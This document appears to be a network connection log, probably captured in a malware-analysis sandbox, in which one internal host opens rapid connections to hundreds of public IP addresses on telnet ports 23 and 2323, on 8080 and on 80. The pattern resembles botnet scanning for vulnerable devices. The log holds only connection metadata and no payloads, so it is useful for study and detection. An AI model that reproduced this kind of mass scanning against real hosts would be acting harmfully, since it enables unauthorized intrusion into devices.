Nov 22, 2023 08:37:51.443068027 CET	54320	23	192.168.2.23	147.140.244.192
Nov 22, 2023 08:37:51.443079948 CET	54320	23	192.168.2.23	195.213.3.141
Nov 22, 2023 08:37:51.443079948 CET	54320	23	192.168.2.23	150.101.30.142
Nov 22, 2023 08:37:51.443084955 CET	54320	23	192.168.2.23	145.247.54.78
Nov 22, 2023 08:37:51.443092108 CET	54320	23	192.168.2.23	169.228.117.46
Nov 22, 2023 08:37:51.443092108 CET	54320	23	192.168.2.23	75.24.97.86
Nov 22, 2023 08:37:51.443108082 CET	54320	23	192.168.2.23	77.23.80.50
Nov 22, 2023 08:37:51.443113089 CET	54320	23	192.168.2.23	220.227.69.84
Nov 22, 2023 08:37:51.443114996 CET	54320	23	192.168.2.23	42.36.91.30
Nov 22, 2023 08:37:51.443121910 CET	54320	23	192.168.2.23	104.15.245.96
Nov 22, 2023 08:37:51.443130970 CET	54320	2323	192.168.2.23	84.139.92.241
Nov 22, 2023 08:37:51.443137884 CET	54320	23	192.168.2.23	40.242.245.243
Nov 22, 2023 08:37:51.443142891 CET	54320	23	192.168.2.23	77.239.91.230
Nov 22, 2023 08:37:51.443146944 CET	54320	23	192.168.2.23	221.130.231.95
Nov 22, 2023 08:37:51.443150997 CET	54320	23	192.168.2.23	45.31.120.161
Nov 22, 2023 08:37:51.443156004 CET	54320	23	192.168.2.23	48.248.167.211
Nov 22, 2023 08:37:51.443156004 CET	54320	23	192.168.2.23	195.161.19.47
Nov 22, 2023 08:37:51.443175077 CET	54320	23	192.168.2.23	37.36.206.12
Nov 22, 2023 08:37:51.443181992 CET	54320	23	192.168.2.23	115.171.114.226
Nov 22, 2023 08:37:51.443181992 CET	54320	23	192.168.2.23	148.230.146.127
Nov 22, 2023 08:37:51.443190098 CET	54320	2323	192.168.2.23	223.84.49.228
Nov 22, 2023 08:37:51.443200111 CET	54320	23	192.168.2.23	170.225.60.184
Nov 22, 2023 08:37:51.443213940 CET	54320	23	192.168.2.23	184.2.226.101
Nov 22, 2023 08:37:51.443214893 CET	54320	23	192.168.2.23	57.196.25.12
Nov 22, 2023 08:37:51.443217039 CET	54320	23	192.168.2.23	183.217.176.13
Nov 22, 2023 08:37:51.443223953 CET	54320	23	192.168.2.23	94.159.58.61
Nov 22, 2023 08:37:51.443226099 CET	54320	23	192.168.2.23	184.144.218.136
Nov 22, 2023 08:37:51.443226099 CET	54320	23	192.168.2.23	90.156.34.38
Nov 22, 2023 08:37:51.443226099 CET	54320	23	192.168.2.23	203.46.32.60
Nov 22, 2023 08:37:51.443228960 CET	54320	2323	192.168.2.23	82.228.196.203
Nov 22, 2023 08:37:51.443228960 CET	54320	23	192.168.2.23	146.52.18.32
Nov 22, 2023 08:37:51.443237066 CET	54320	23	192.168.2.23	86.205.0.174
Nov 22, 2023 08:37:51.443237066 CET	54320	23	192.168.2.23	210.236.89.251
Nov 22, 2023 08:37:51.443240881 CET	54320	23	192.168.2.23	109.56.239.22
Nov 22, 2023 08:37:51.443240881 CET	54320	23	192.168.2.23	166.127.253.18
Nov 22, 2023 08:37:51.443248987 CET	54320	23	192.168.2.23	37.209.58.30
Nov 22, 2023 08:37:51.443250895 CET	54320	23	192.168.2.23	80.84.120.30
Nov 22, 2023 08:37:51.443255901 CET	54320	23	192.168.2.23	104.171.13.46
Nov 22, 2023 08:37:51.443255901 CET	54320	23	192.168.2.23	32.133.168.213
Nov 22, 2023 08:37:51.443263054 CET	54320	23	192.168.2.23	106.66.197.59
Nov 22, 2023 08:37:51.443267107 CET	54320	23	192.168.2.23	105.63.244.57
Nov 22, 2023 08:37:51.443268061 CET	54320	2323	192.168.2.23	19.27.231.41
Nov 22, 2023 08:37:51.443273067 CET	54320	23	192.168.2.23	79.222.130.10
Nov 22, 2023 08:37:51.443279028 CET	54320	23	192.168.2.23	143.26.232.191
Nov 22, 2023 08:37:51.443288088 CET	54320	23	192.168.2.23	42.12.79.120
Nov 22, 2023 08:37:51.443290949 CET	54320	23	192.168.2.23	134.210.15.48
Nov 22, 2023 08:37:51.443300009 CET	54320	23	192.168.2.23	201.138.12.151
Nov 22, 2023 08:37:51.443304062 CET	54320	23	192.168.2.23	144.175.16.40
Nov 22, 2023 08:37:51.443310022 CET	54320	23	192.168.2.23	216.136.255.233
Nov 22, 2023 08:37:51.443310022 CET	54320	23	192.168.2.23	83.237.33.194
Nov 22, 2023 08:37:51.443319082 CET	54320	23	192.168.2.23	169.47.125.39
Nov 22, 2023 08:37:51.443322897 CET	54320	2323	192.168.2.23	147.87.166.15
Nov 22, 2023 08:37:51.443326950 CET	54320	23	192.168.2.23	138.230.88.178
Nov 22, 2023 08:37:51.443340063 CET	54320	23	192.168.2.23	5.203.130.70
Nov 22, 2023 08:37:51.443340063 CET	54320	23	192.168.2.23	189.241.93.245
Nov 22, 2023 08:37:51.443358898 CET	54320	23	192.168.2.23	79.194.83.139
Nov 22, 2023 08:37:51.443362951 CET	54320	23	192.168.2.23	70.58.88.150
Nov 22, 2023 08:37:51.443365097 CET	54320	23	192.168.2.23	20.233.185.133
Nov 22, 2023 08:37:51.443365097 CET	54320	23	192.168.2.23	155.38.98.115
Nov 22, 2023 08:37:51.443367958 CET	54320	23	192.168.2.23	135.45.244.136
Nov 22, 2023 08:37:51.443377972 CET	54320	23	192.168.2.23	44.110.85.224
Nov 22, 2023 08:37:51.443391085 CET	54320	2323	192.168.2.23	97.97.77.60
Nov 22, 2023 08:37:51.443397999 CET	54320	23	192.168.2.23	51.117.127.251
Nov 22, 2023 08:37:51.443406105 CET	54320	23	192.168.2.23	107.209.247.24
Nov 22, 2023 08:37:51.443408012 CET	54320	23	192.168.2.23	118.48.235.126
Nov 22, 2023 08:37:51.443409920 CET	54320	23	192.168.2.23	182.68.18.94
Nov 22, 2023 08:37:51.443414927 CET	54320	23	192.168.2.23	212.219.138.36
Nov 22, 2023 08:37:51.443423033 CET	54320	23	192.168.2.23	211.107.146.183
Nov 22, 2023 08:37:51.443432093 CET	54320	23	192.168.2.23	80.60.212.158
Nov 22, 2023 08:37:51.443437099 CET	54320	23	192.168.2.23	139.253.193.239
Nov 22, 2023 08:37:51.443438053 CET	54320	23	192.168.2.23	142.74.81.221
Nov 22, 2023 08:37:51.443439960 CET	54320	2323	192.168.2.23	161.250.159.184
Nov 22, 2023 08:37:51.443455935 CET	54320	23	192.168.2.23	54.55.162.52
Nov 22, 2023 08:37:51.443455935 CET	54320	23	192.168.2.23	47.185.60.164
Nov 22, 2023 08:37:51.443455935 CET	54320	23	192.168.2.23	174.226.250.168
Nov 22, 2023 08:37:51.443470955 CET	54320	23	192.168.2.23	199.250.83.234
Nov 22, 2023 08:37:51.443470955 CET	54320	23	192.168.2.23	163.6.13.210
Nov 22, 2023 08:37:51.443476915 CET	54320	23	192.168.2.23	24.230.217.5
Nov 22, 2023 08:37:51.443476915 CET	54320	23	192.168.2.23	142.253.129.229
Nov 22, 2023 08:37:51.443479061 CET	54320	23	192.168.2.23	208.148.86.4
Nov 22, 2023 08:37:51.443492889 CET	54320	23	192.168.2.23	195.186.218.239
Nov 22, 2023 08:37:51.443492889 CET	54320	23	192.168.2.23	193.122.41.237
Nov 22, 2023 08:37:51.443499088 CET	54320	2323	192.168.2.23	19.239.181.11
Nov 22, 2023 08:37:51.443499088 CET	54320	23	192.168.2.23	177.47.133.216
Nov 22, 2023 08:37:51.443499088 CET	54320	23	192.168.2.23	142.175.110.92
Nov 22, 2023 08:37:51.443504095 CET	54320	23	192.168.2.23	84.121.66.45
Nov 22, 2023 08:37:51.443504095 CET	54320	23	192.168.2.23	182.43.116.14
Nov 22, 2023 08:37:51.443511963 CET	54320	23	192.168.2.23	179.5.12.255
Nov 22, 2023 08:37:51.443537951 CET	54320	2323	192.168.2.23	168.19.173.121
Nov 22, 2023 08:37:51.443537951 CET	54320	23	192.168.2.23	27.113.196.97
Nov 22, 2023 08:37:51.443538904 CET	54320	23	192.168.2.23	92.126.220.198
Nov 22, 2023 08:37:51.443538904 CET	54320	23	192.168.2.23	86.60.141.88
Nov 22, 2023 08:37:51.443538904 CET	54320	23	192.168.2.23	216.44.31.109
Nov 22, 2023 08:37:51.443542004 CET	54320	23	192.168.2.23	185.244.138.115
Nov 22, 2023 08:37:51.443542004 CET	54320	23	192.168.2.23	52.234.240.8
Nov 22, 2023 08:37:51.443737984 CET	54618	8080	192.168.2.23	62.113.230.74
Nov 22, 2023 08:37:51.443741083 CET	36898	8080	192.168.2.23	31.136.219.234
Nov 22, 2023 08:37:51.544594049 CET	23	54320	83.172.60.209	192.168.2.23
Nov 22, 2023 08:37:51.570976019 CET	8080	54329	62.115.174.198	192.168.2.23
Nov 22, 2023 08:37:51.594398022 CET	23	54320	45.76.171.6	192.168.2.23
Nov 22, 2023 08:37:51.600747108 CET	8080	54329	62.160.235.63	192.168.2.23
Nov 22, 2023 08:37:51.607609034 CET	8080	51792	94.238.153.128	192.168.2.23
Nov 22, 2023 08:37:51.607688904 CET	51792	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:51.607940912 CET	51792	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:51.607975006 CET	51792	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:51.608139992 CET	51800	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:51.610141993 CET	8080	54329	62.96.59.56	192.168.2.23
Nov 22, 2023 08:37:51.610611916 CET	8080	54329	95.244.142.190	192.168.2.23
Nov 22, 2023 08:37:51.610676050 CET	8080	54329	62.100.140.23	192.168.2.23
Nov 22, 2023 08:37:51.611601114 CET	8080	54329	62.20.134.153	192.168.2.23
Nov 22, 2023 08:37:51.612375021 CET	8080	54329	31.136.130.132	192.168.2.23
Nov 22, 2023 08:37:51.612459898 CET	54329	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:51.614880085 CET	23	54320	90.16.64.171	192.168.2.23
Nov 22, 2023 08:37:51.616231918 CET	8080	59444	31.136.70.145	192.168.2.23
Nov 22, 2023 08:37:51.616308928 CET	38768	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:51.616309881 CET	59444	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:51.616332054 CET	59444	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:51.616348982 CET	59444	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:51.616357088 CET	59454	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:51.616851091 CET	8080	54329	85.10.214.169	192.168.2.23
Nov 22, 2023 08:37:51.619744062 CET	8080	54329	85.14.194.72	192.168.2.23
Nov 22, 2023 08:37:51.620546103 CET	8080	54329	95.246.190.44	192.168.2.23
Nov 22, 2023 08:37:51.622107983 CET	8080	54329	31.33.81.209	192.168.2.23
Nov 22, 2023 08:37:51.623239994 CET	80	49470	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:51.623281956 CET	49470	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:51.624871969 CET	8080	54329	62.168.121.8	192.168.2.23
Nov 22, 2023 08:37:51.634963036 CET	23	54320	193.19.179.209	192.168.2.23
Nov 22, 2023 08:37:51.636059046 CET	8080	54329	85.35.32.137	192.168.2.23
Nov 22, 2023 08:37:51.645768881 CET	8080	54329	62.193.99.243	192.168.2.23
Nov 22, 2023 08:37:51.646508932 CET	8080	54329	31.43.30.38	192.168.2.23
Nov 22, 2023 08:37:51.646663904 CET	54329	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:51.647516012 CET	8080	54329	94.121.181.0	192.168.2.23
Nov 22, 2023 08:37:51.647571087 CET	54329	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:51.651571035 CET	8080	54026	31.200.127.109	192.168.2.23
Nov 22, 2023 08:37:51.651614904 CET	54026	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:51.651648998 CET	53320	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:51.651660919 CET	43820	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:51.651679993 CET	54026	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:51.651679993 CET	54026	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:51.651710987 CET	54040	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:51.656174898 CET	8080	54329	31.145.75.50	192.168.2.23
Nov 22, 2023 08:37:51.658518076 CET	8080	43116	94.121.79.125	192.168.2.23
Nov 22, 2023 08:37:51.658565044 CET	43116	8080	192.168.2.23	94.121.79.125
Nov 22, 2023 08:37:51.658577919 CET	43116	8080	192.168.2.23	94.121.79.125
Nov 22, 2023 08:37:51.658591986 CET	43116	8080	192.168.2.23	94.121.79.125
Nov 22, 2023 08:37:51.658612013 CET	43130	8080	192.168.2.23	94.121.79.125
Nov 22, 2023 08:37:51.670495033 CET	23	54320	195.239.252.117	192.168.2.23
Nov 22, 2023 08:37:51.689661980 CET	8080	54329	94.43.66.135	192.168.2.23
Nov 22, 2023 08:37:51.693388939 CET	23	54320	189.41.235.64	192.168.2.23
Nov 22, 2023 08:37:51.699902058 CET	23	54320	60.68.95.161	192.168.2.23
Nov 22, 2023 08:37:51.701844931 CET	8080	54329	62.76.209.26	192.168.2.23
Nov 22, 2023 08:37:51.710530043 CET	37215	54335	197.253.44.4	192.168.2.23
Nov 22, 2023 08:37:51.717842102 CET	2323	54320	60.156.239.209	192.168.2.23
Nov 22, 2023 08:37:51.736340046 CET	23	54320	118.48.235.126	192.168.2.23
Nov 22, 2023 08:37:51.736746073 CET	8080	54329	94.190.208.234	192.168.2.23
Nov 22, 2023 08:37:51.744596004 CET	2323	54320	119.207.231.120	192.168.2.23
Nov 22, 2023 08:37:51.752949953 CET	23	54320	220.133.92.194	192.168.2.23
Nov 22, 2023 08:37:51.760474920 CET	23	54320	38.207.11.249	192.168.2.23
Nov 22, 2023 08:37:51.760648966 CET	54320	23	192.168.2.23	38.207.11.249
Nov 22, 2023 08:37:51.783454895 CET	8080	54329	95.127.223.120	192.168.2.23
Nov 22, 2023 08:37:51.783813953 CET	8080	51800	94.238.153.128	192.168.2.23
Nov 22, 2023 08:37:51.787703037 CET	51800	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:51.787703991 CET	51800	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:51.799163103 CET	23	54320	123.54.41.134	192.168.2.23
Nov 22, 2023 08:37:51.799988985 CET	8080	38768	31.136.130.132	192.168.2.23
Nov 22, 2023 08:37:51.800065994 CET	38768	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:51.800216913 CET	38768	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:51.800216913 CET	38768	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:51.800232887 CET	38780	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:51.801234007 CET	8080	59454	31.136.70.145	192.168.2.23
Nov 22, 2023 08:37:51.801295996 CET	59454	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:51.801311016 CET	59454	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:51.812494040 CET	37215	54335	197.220.10.33	192.168.2.23
Nov 22, 2023 08:37:51.852591991 CET	23	54320	112.31.160.7	192.168.2.23
Nov 22, 2023 08:37:51.852756977 CET	54320	23	192.168.2.23	112.31.160.7
Nov 22, 2023 08:37:51.859323978 CET	54328	80	192.168.2.23	95.206.95.182
Nov 22, 2023 08:37:51.859342098 CET	54328	80	192.168.2.23	95.89.226.169
Nov 22, 2023 08:37:51.859381914 CET	54328	80	192.168.2.23	95.132.233.90
Nov 22, 2023 08:37:51.859400034 CET	54328	80	192.168.2.23	95.133.80.55
Nov 22, 2023 08:37:51.859400034 CET	54328	80	192.168.2.23	95.103.4.53
Nov 22, 2023 08:37:51.859421015 CET	54328	80	192.168.2.23	95.227.147.239
Nov 22, 2023 08:37:51.859426022 CET	54328	80	192.168.2.23	95.78.94.29
Nov 22, 2023 08:37:51.859445095 CET	54328	80	192.168.2.23	95.177.199.5
Nov 22, 2023 08:37:51.859482050 CET	54328	80	192.168.2.23	95.29.51.191
Nov 22, 2023 08:37:51.859544992 CET	54328	80	192.168.2.23	95.182.177.45
Nov 22, 2023 08:37:51.859546900 CET	54328	80	192.168.2.23	95.158.73.183
Nov 22, 2023 08:37:51.859560966 CET	54328	80	192.168.2.23	95.220.199.26
Nov 22, 2023 08:37:51.859565973 CET	54328	80	192.168.2.23	95.47.33.172
Nov 22, 2023 08:37:51.859581947 CET	54328	80	192.168.2.23	95.80.72.5
Nov 22, 2023 08:37:51.859595060 CET	54328	80	192.168.2.23	95.251.239.21
Nov 22, 2023 08:37:51.859627962 CET	54328	80	192.168.2.23	95.72.137.195
Nov 22, 2023 08:37:51.859635115 CET	54328	80	192.168.2.23	95.220.88.224
Nov 22, 2023 08:37:51.859647989 CET	54328	80	192.168.2.23	95.103.245.109
Nov 22, 2023 08:37:51.859704018 CET	54328	80	192.168.2.23	95.161.164.53
Nov 22, 2023 08:37:51.859724045 CET	54328	80	192.168.2.23	95.63.31.162
Nov 22, 2023 08:37:51.859740973 CET	54328	80	192.168.2.23	95.22.116.140
Nov 22, 2023 08:37:51.859769106 CET	54328	80	192.168.2.23	95.158.109.119
Nov 22, 2023 08:37:51.859786987 CET	54328	80	192.168.2.23	95.175.113.160
Nov 22, 2023 08:37:51.859814882 CET	54328	80	192.168.2.23	95.81.236.146
Nov 22, 2023 08:37:51.859848022 CET	54328	80	192.168.2.23	95.60.88.133
Nov 22, 2023 08:37:51.859865904 CET	54328	80	192.168.2.23	95.188.12.180
Nov 22, 2023 08:37:51.859899044 CET	54328	80	192.168.2.23	95.80.11.230
Nov 22, 2023 08:37:51.859915972 CET	54328	80	192.168.2.23	95.13.230.80
Nov 22, 2023 08:37:51.859961033 CET	54328	80	192.168.2.23	95.83.237.133
Nov 22, 2023 08:37:51.859972954 CET	54328	80	192.168.2.23	95.215.154.247
Nov 22, 2023 08:37:51.859992027 CET	54328	80	192.168.2.23	95.159.5.132
Nov 22, 2023 08:37:51.860007048 CET	54328	80	192.168.2.23	95.151.248.127
Nov 22, 2023 08:37:51.860025883 CET	54328	80	192.168.2.23	95.110.133.66
Nov 22, 2023 08:37:51.860079050 CET	54328	80	192.168.2.23	95.235.216.34
Nov 22, 2023 08:37:51.860094070 CET	54328	80	192.168.2.23	95.89.181.178
Nov 22, 2023 08:37:51.860129118 CET	54328	80	192.168.2.23	95.78.238.143
Nov 22, 2023 08:37:51.860142946 CET	54328	80	192.168.2.23	95.60.123.90
Nov 22, 2023 08:37:51.860162020 CET	54328	80	192.168.2.23	95.150.90.126
Nov 22, 2023 08:37:51.860182047 CET	54328	80	192.168.2.23	95.124.210.86
Nov 22, 2023 08:37:51.860182047 CET	54328	80	192.168.2.23	95.218.80.92
Nov 22, 2023 08:37:51.860182047 CET	54328	80	192.168.2.23	95.73.237.248
Nov 22, 2023 08:37:51.860182047 CET	54328	80	192.168.2.23	95.191.126.190
Nov 22, 2023 08:37:51.860182047 CET	54328	80	192.168.2.23	95.191.150.212
Nov 22, 2023 08:37:51.860182047 CET	54328	80	192.168.2.23	95.32.18.95
Nov 22, 2023 08:37:51.860182047 CET	54328	80	192.168.2.23	95.46.8.97
Nov 22, 2023 08:37:51.860183001 CET	54328	80	192.168.2.23	95.243.160.78
Nov 22, 2023 08:37:51.860205889 CET	54328	80	192.168.2.23	95.67.61.19
Nov 22, 2023 08:37:51.860233068 CET	54328	80	192.168.2.23	95.65.203.132
Nov 22, 2023 08:37:51.860245943 CET	54328	80	192.168.2.23	95.138.252.218
Nov 22, 2023 08:37:51.860253096 CET	54328	80	192.168.2.23	95.0.188.68
Nov 22, 2023 08:37:51.860261917 CET	54328	80	192.168.2.23	95.50.103.245
Nov 22, 2023 08:37:51.860289097 CET	54328	80	192.168.2.23	95.237.75.171
Nov 22, 2023 08:37:51.860305071 CET	54328	80	192.168.2.23	95.210.131.180
Nov 22, 2023 08:37:51.860335112 CET	54328	80	192.168.2.23	95.219.67.139
Nov 22, 2023 08:37:51.860356092 CET	54328	80	192.168.2.23	95.113.192.193
Nov 22, 2023 08:37:51.860378981 CET	54328	80	192.168.2.23	95.245.31.61
Nov 22, 2023 08:37:51.860415936 CET	54328	80	192.168.2.23	95.212.29.236
Nov 22, 2023 08:37:51.860428095 CET	54328	80	192.168.2.23	95.152.249.14
Nov 22, 2023 08:37:51.860444069 CET	54328	80	192.168.2.23	95.116.93.76
Nov 22, 2023 08:37:51.860487938 CET	54328	80	192.168.2.23	95.96.152.138
Nov 22, 2023 08:37:51.860502958 CET	54328	80	192.168.2.23	95.22.17.11
Nov 22, 2023 08:37:51.860548973 CET	54328	80	192.168.2.23	95.203.135.136
Nov 22, 2023 08:37:51.860568047 CET	54328	80	192.168.2.23	95.173.36.145
Nov 22, 2023 08:37:51.860584974 CET	54328	80	192.168.2.23	95.77.250.125
Nov 22, 2023 08:37:51.860601902 CET	54328	80	192.168.2.23	95.50.196.161
Nov 22, 2023 08:37:51.860620022 CET	54328	80	192.168.2.23	95.236.190.74
Nov 22, 2023 08:37:51.860640049 CET	54328	80	192.168.2.23	95.179.109.43
Nov 22, 2023 08:37:51.860651970 CET	54328	80	192.168.2.23	95.184.142.119
Nov 22, 2023 08:37:51.860686064 CET	54328	80	192.168.2.23	95.12.121.212
Nov 22, 2023 08:37:51.860709906 CET	54328	80	192.168.2.23	95.11.177.89
Nov 22, 2023 08:37:51.860738993 CET	54328	80	192.168.2.23	95.90.59.226
Nov 22, 2023 08:37:51.860764027 CET	54328	80	192.168.2.23	95.56.104.133
Nov 22, 2023 08:37:51.860785961 CET	54328	80	192.168.2.23	95.91.180.165
Nov 22, 2023 08:37:51.860800982 CET	54328	80	192.168.2.23	95.139.238.102
Nov 22, 2023 08:37:51.860821009 CET	54328	80	192.168.2.23	95.90.150.9
Nov 22, 2023 08:37:51.860857964 CET	54328	80	192.168.2.23	95.39.120.194
Nov 22, 2023 08:37:51.860874891 CET	54328	80	192.168.2.23	95.186.29.218
Nov 22, 2023 08:37:51.860922098 CET	54328	80	192.168.2.23	95.66.177.66
Nov 22, 2023 08:37:51.860939980 CET	54328	80	192.168.2.23	95.246.134.86
Nov 22, 2023 08:37:51.860955000 CET	54328	80	192.168.2.23	95.13.32.130
Nov 22, 2023 08:37:51.860984087 CET	54328	80	192.168.2.23	95.145.175.63
Nov 22, 2023 08:37:51.861010075 CET	54328	80	192.168.2.23	95.122.110.156
Nov 22, 2023 08:37:51.861026049 CET	54328	80	192.168.2.23	95.68.80.129
Nov 22, 2023 08:37:51.861056089 CET	54328	80	192.168.2.23	95.78.21.18
Nov 22, 2023 08:37:51.861095905 CET	54328	80	192.168.2.23	95.250.195.43
Nov 22, 2023 08:37:51.861109972 CET	54328	80	192.168.2.23	95.22.216.108
Nov 22, 2023 08:37:51.861152887 CET	54328	80	192.168.2.23	95.186.175.62
Nov 22, 2023 08:37:51.861175060 CET	54328	80	192.168.2.23	95.237.174.169
Nov 22, 2023 08:37:51.861193895 CET	54328	80	192.168.2.23	95.159.253.123
Nov 22, 2023 08:37:51.861207962 CET	54328	80	192.168.2.23	95.83.178.106
Nov 22, 2023 08:37:51.861222982 CET	54328	80	192.168.2.23	95.174.126.207
Nov 22, 2023 08:37:51.861252069 CET	54328	80	192.168.2.23	95.141.18.225
Nov 22, 2023 08:37:51.861258984 CET	54328	80	192.168.2.23	95.12.79.251
Nov 22, 2023 08:37:51.861274004 CET	54328	80	192.168.2.23	95.26.165.166
Nov 22, 2023 08:37:51.861289024 CET	54328	80	192.168.2.23	95.115.202.19
Nov 22, 2023 08:37:51.861311913 CET	54328	80	192.168.2.23	95.163.118.187
Nov 22, 2023 08:37:51.861330032 CET	54328	80	192.168.2.23	95.221.190.129
Nov 22, 2023 08:37:51.861361027 CET	54328	80	192.168.2.23	95.254.86.9
Nov 22, 2023 08:37:51.861377001 CET	54328	80	192.168.2.23	95.127.169.35
Nov 22, 2023 08:37:51.861390114 CET	54328	80	192.168.2.23	95.113.211.83
Nov 22, 2023 08:37:51.861407995 CET	54328	80	192.168.2.23	95.201.246.203
Nov 22, 2023 08:37:51.861445904 CET	54328	80	192.168.2.23	95.121.48.7
Nov 22, 2023 08:37:51.861459970 CET	54328	80	192.168.2.23	95.117.191.69
Nov 22, 2023 08:37:51.861474037 CET	54328	80	192.168.2.23	95.176.222.61
Nov 22, 2023 08:37:51.861493111 CET	54328	80	192.168.2.23	95.19.169.100
Nov 22, 2023 08:37:51.861507893 CET	54328	80	192.168.2.23	95.6.71.52
Nov 22, 2023 08:37:51.861526012 CET	54328	80	192.168.2.23	95.135.82.234
Nov 22, 2023 08:37:51.861550093 CET	54328	80	192.168.2.23	95.37.108.10
Nov 22, 2023 08:37:51.861576080 CET	54328	80	192.168.2.23	95.31.66.221
Nov 22, 2023 08:37:51.861576080 CET	54328	80	192.168.2.23	95.11.117.59
Nov 22, 2023 08:37:51.861576080 CET	54328	80	192.168.2.23	95.248.118.87
Nov 22, 2023 08:37:51.861576080 CET	54328	80	192.168.2.23	95.128.92.29
Nov 22, 2023 08:37:51.861576080 CET	54328	80	192.168.2.23	95.175.163.90
Nov 22, 2023 08:37:51.861576080 CET	54328	80	192.168.2.23	95.121.105.130
Nov 22, 2023 08:37:51.861576080 CET	54328	80	192.168.2.23	95.126.80.210
Nov 22, 2023 08:37:51.861586094 CET	54328	80	192.168.2.23	95.51.28.208
Nov 22, 2023 08:37:51.861603975 CET	54328	80	192.168.2.23	95.220.52.132
Nov 22, 2023 08:37:51.861615896 CET	54328	80	192.168.2.23	95.214.32.20
Nov 22, 2023 08:37:51.861615896 CET	54328	80	192.168.2.23	95.231.161.180
Nov 22, 2023 08:37:51.861615896 CET	54328	80	192.168.2.23	95.177.184.150
Nov 22, 2023 08:37:51.861615896 CET	54328	80	192.168.2.23	95.236.73.142
Nov 22, 2023 08:37:51.861622095 CET	54328	80	192.168.2.23	95.56.185.135
Nov 22, 2023 08:37:51.861639977 CET	54328	80	192.168.2.23	95.237.60.54
Nov 22, 2023 08:37:51.861654997 CET	54328	80	192.168.2.23	95.122.90.172
Nov 22, 2023 08:37:51.861675978 CET	54328	80	192.168.2.23	95.246.44.60
Nov 22, 2023 08:37:51.861697912 CET	54328	80	192.168.2.23	95.32.152.95
Nov 22, 2023 08:37:51.861717939 CET	54328	80	192.168.2.23	95.214.75.60
Nov 22, 2023 08:37:51.861736059 CET	54328	80	192.168.2.23	95.51.31.95
Nov 22, 2023 08:37:51.861752033 CET	54328	80	192.168.2.23	95.186.105.192
Nov 22, 2023 08:37:51.861768007 CET	54328	80	192.168.2.23	95.34.4.76
Nov 22, 2023 08:37:51.861782074 CET	54328	80	192.168.2.23	95.25.58.244
Nov 22, 2023 08:37:51.861799002 CET	54328	80	192.168.2.23	95.105.123.76
Nov 22, 2023 08:37:51.861824989 CET	54328	80	192.168.2.23	95.202.170.70
Nov 22, 2023 08:37:51.861852884 CET	54328	80	192.168.2.23	95.32.92.112
Nov 22, 2023 08:37:51.861876011 CET	54328	80	192.168.2.23	95.15.55.35
Nov 22, 2023 08:37:51.861903906 CET	54328	80	192.168.2.23	95.149.145.70
Nov 22, 2023 08:37:51.861922979 CET	54328	80	192.168.2.23	95.233.100.145
Nov 22, 2023 08:37:51.861941099 CET	54328	80	192.168.2.23	95.248.48.96
Nov 22, 2023 08:37:51.861955881 CET	54328	80	192.168.2.23	95.151.177.36
Nov 22, 2023 08:37:51.862001896 CET	54328	80	192.168.2.23	95.253.220.10
Nov 22, 2023 08:37:51.862030983 CET	54328	80	192.168.2.23	95.211.158.233
Nov 22, 2023 08:37:51.862155914 CET	54328	80	192.168.2.23	95.6.25.107
Nov 22, 2023 08:37:51.862174988 CET	54328	80	192.168.2.23	95.84.91.200
Nov 22, 2023 08:37:51.862189054 CET	54328	80	192.168.2.23	95.240.89.151
Nov 22, 2023 08:37:51.862207890 CET	54328	80	192.168.2.23	95.11.178.211
Nov 22, 2023 08:37:51.862226963 CET	54328	80	192.168.2.23	95.33.134.17
Nov 22, 2023 08:37:51.862243891 CET	54328	80	192.168.2.23	95.33.11.80
Nov 22, 2023 08:37:51.862268925 CET	54328	80	192.168.2.23	95.1.93.8
Nov 22, 2023 08:37:51.862278938 CET	54328	80	192.168.2.23	95.132.227.40
Nov 22, 2023 08:37:51.862296104 CET	54328	80	192.168.2.23	95.34.9.96
Nov 22, 2023 08:37:51.862314939 CET	54328	80	192.168.2.23	95.217.107.50
Nov 22, 2023 08:37:51.862333059 CET	54328	80	192.168.2.23	95.128.180.76
Nov 22, 2023 08:37:51.862385988 CET	54328	80	192.168.2.23	95.112.222.72
Nov 22, 2023 08:37:51.862401962 CET	54328	80	192.168.2.23	95.158.83.88
Nov 22, 2023 08:37:51.862421989 CET	54328	80	192.168.2.23	95.176.230.213
Nov 22, 2023 08:37:51.862451077 CET	54328	80	192.168.2.23	95.209.46.29
Nov 22, 2023 08:37:51.862471104 CET	54328	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:51.867970943 CET	54328	80	192.168.2.23	95.103.155.121
Nov 22, 2023 08:37:51.867971897 CET	54328	80	192.168.2.23	95.109.77.71
Nov 22, 2023 08:37:51.867971897 CET	54328	80	192.168.2.23	95.179.211.84
Nov 22, 2023 08:37:51.871184111 CET	8080	54026	31.200.127.109	192.168.2.23
Nov 22, 2023 08:37:51.872670889 CET	8080	53320	31.43.30.38	192.168.2.23
Nov 22, 2023 08:37:51.872769117 CET	53320	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:51.872879028 CET	53320	8080	192.168.2.23	31.43.30.38
